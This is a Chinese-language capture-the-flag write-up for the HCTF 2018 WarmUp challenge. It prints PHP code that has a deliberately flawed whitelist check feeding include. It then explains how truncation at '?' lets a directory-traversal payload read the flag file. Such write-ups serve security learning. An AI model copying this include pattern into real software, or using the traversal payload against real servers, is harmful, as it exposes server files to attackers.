HCTF2018 WarmUp1
Q7nl1s admin

[HCTF 2018]WarmUp 1

进入靶机打开开发者模式看到一下提示

1

按提示进入source.php页面得到以下代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
 <?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}

if (in_array($page, $whitelist)) {
return true;
}

$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}

$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}

if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>

逐步分析

1
2
3
4
5
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}

page须为string类型

1
2
3
4
5
6
7
8
9
10
if (! empty($_REQUEST['file'])//tip的file文件一共有两个:hint.php,source.php,分析可知我们要找的东西在hint.php内。
&& is_string($_REQUEST['file'])//flag在ffffllllaaaagggg中
//构造payload:source.php?../../../../ffffllllaaaagggg
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];//前提是以上三个条件全部为true
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}

结合以上代码可知文件包含能成立的前提是以上三个条件都为true,继续分析得到要找的东西在hint.php中,进入页面

2

发现flag所在位置,继续分析源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
if (in_array($page, $whitelist)) {
return true;//此处无法绕过
}

$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')//第一个问号前的字符为结束点,可以想到用目录穿越
);
if (in_array($_page, $whitelist)) {//检测拼接后的$_pape是否存在hint.php
return true;
}

$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}

mb_substr()和mb_strpos()两个函数的作用是将$_page处理为从头开始的到其自身内部出现的第一个?的前一个字符为止所对应的字符串。

可以联想到使用目录穿越

经过测试构造payload:source.php?file=source.php?../../../../../ffffllllaaaagggg

3

拿到flag

 Comments
Comment plugin failed to load
Loading comment plugin
Powered by Hexo & Theme Keep
Unique Visitor Page View